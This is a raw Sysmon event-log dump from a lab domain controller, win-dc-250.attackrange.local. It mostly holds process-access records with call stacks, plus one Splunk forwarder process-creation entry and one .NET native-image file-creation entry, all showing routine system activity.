13:20:15.157{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.157{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.157{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.157{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005346Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.157{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005345Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.157{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005344Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.157{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005343Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.157{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005342Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.157{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-450F-6000-4301-000000009A01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005341Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.157{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-450F-6000-4301-000000009A01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005340Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:15.158{08A6967A-450F-6000-4301-000000009A01}1252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.986{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4510-6000-4901-000000009A01}4564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.970{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4510-6000-4901-000000009A01}4564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.970{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4510-6000-4901-000000009A01}4564C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005409Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.923{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4510-6000-4801-000000009A01}4632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005408Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.907{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4510-6000-4801-000000009A01}4632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005407Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.907{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4510-6000-4801-000000009A01}4632C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000005406Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:20:16.829{08A6967A-4510-6000-4601-000000009A01}2972C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b9c-0\System.Runtime.Remoting.dll2021-01-14 13:20:16.829 10341000x80000000000000005405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.814{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.814{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.814{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.814{08A6967A-4286-6000-0B00-000000009A01}8522640C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000005401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:20:16.704{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 